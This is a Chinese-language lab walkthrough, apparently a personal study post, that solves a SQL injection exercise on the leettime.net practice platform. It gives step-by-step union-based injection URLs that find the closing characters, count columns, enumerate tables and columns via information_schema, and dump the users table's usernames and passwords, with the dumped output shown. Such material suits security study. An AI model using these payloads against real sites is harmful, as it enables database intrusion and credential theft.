SQL注入在线练习平台(http://leettime.net)
练习基础模块4
1、判断闭合字符和列数
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1
正常显示内容
双引号闭合 " 显示正常页面这个就不是闭合字符
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22
双引号和单引号闭合 "' 显示报错页面这个就不是闭合字符
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22%27
由图片来开还有括号的存在 )
尝试闭合字符 -- - 成功
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20or%201=1%20--%20-
接下来获取表的列数
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%202%20--%20-
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%204%20--%20-
order by 5 -- -这个报错说明 数据表的列数为4
2、获取数据的数据回显点和数据获取
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,2,3,4%20--%20-
数据在第二行的地方可以查询回显数据
数据库查询 leettime_761wHole
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,database(),3,4%20--%20-
查询数据安装的路径/usr/@@basedir
找出表名 testtable1,userlogs,users
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27leettime_761wHole%27),3,4%20--%20-
找出列明id,username,password,user_type,sec_code
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27leettime_761wHole%27%20and%20table_name=%27users%27),3,4%20--%20-
Username is : #injector#khan#,#decompiler#hacktract#,#devilhunte#dante#,#Zen#sec-idiots#,#Zenodermus#security-i#,#grayhat#hacker#,#khan#haxor#,#admin#sadmin#
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(0x23,username,0x23,password,0x23)%20from%20leettime_761wHole.users),3,4%20--%20-
总结:注意熟悉information_schama这个表的结构,还有注意group_concat使用
https://zhuanlan.zhihu.com/p/76518525